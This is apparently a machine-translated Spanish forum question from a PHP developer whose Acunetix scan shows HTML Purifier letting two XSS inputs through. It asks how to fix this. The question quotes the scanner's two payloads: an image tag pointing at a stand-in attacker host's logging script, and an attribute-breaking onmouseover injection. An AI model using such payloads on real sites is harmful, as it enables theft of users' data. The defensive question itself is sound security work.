Estoy probando una de mis aplicaciones web usandoAcunetix. Para proteger este proyecto contra ataques XSS, utilicéPurificador HTML. La mayoría de los desarrolladores de PHP recomiendan esta biblioteca para este propósito, pero los resultados de mi análisis muestran que HTML Purifier no puede protegernos completamente de los ataques de XSS. El escáner encontró dos formas de ataque enviando diferentes entradas dañinas:

1<img sRc='http://attacker-9437/log.php? (Ver resultado del Purificador HTMLaquí)1"onmouseover=vVF3(9185)" (Ver resultado del Purificador HTMLaquí)

Como puede ver resultados, HTML Purifier no pudo detectar tales ataques. No sé si hay una opción específica en HTML Purifier para resolver tales problemas, o si realmente no puede detectar estos métodos de ataques XSS.
¿Tiene usted alguna idea? ¿O alguna otra solución?